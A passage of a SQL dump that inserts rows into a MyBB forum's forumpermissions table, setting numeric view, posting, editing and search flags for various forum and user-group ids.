`canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('824', '43', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('825', '43', '8', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('826', '43', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('454', '44', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('455', '44', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('456', '44', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('457', '44', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('458', '44', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('463', '45', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('464', '45', '2', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('465', '45', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('466', '45', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('467', '45', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('682', '48', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('683', '48', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('684', '48', '3', '0', '1', '0', '1', '0', '0', '1', '1', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('685', '48', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('686', '48', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('687', '48', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('688', '48', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('170', '49', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('983', '50', '2', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('987', '50', '9', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('984', '50', '5', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('986', '50', '8', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('988', '50', '10', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('603', '5', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('187', '2', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('535', '2', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('631', '19', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('190', '28', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('191', '29', '12', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('192', '39', '12', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('847', '30', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('441', '31', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('459', '44', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('468', '45', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('689', '48', '12', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('989', '50', '12', '0', '0', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('205', '54', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('206', '54', '2', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('207', '54', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('208', '54', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('209', '54', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('210', '54', '12', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('985', '50', '6', '1', '1', '0', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('219', '59', '10', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('604', '5', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('221', '2', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('607', '5', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('632', '19', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('224', '28', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('225', '29', '13', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('226', '39', '13', '1', '1', '0', '0', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('848', '30', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('442', '31', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('460', '44', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('469', '45', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('690', '48', '13', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('990', '50', '13', '0', '0', '1', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('233', '54', '13', '0', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('335', '60', '1', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('336', '60', '2', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('337', '60', '5', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('338', '60', '6', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('339', '60', '8', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1'); INSERT INTO `mybb_forumpermissions` (`pid`, `fid`, `gid`, `canview`, `canviewthreads`, `canonlyviewownthreads`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `cansearch`) VALUES ('340', '60', '9', '0', '1', '0', '1', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '1'); 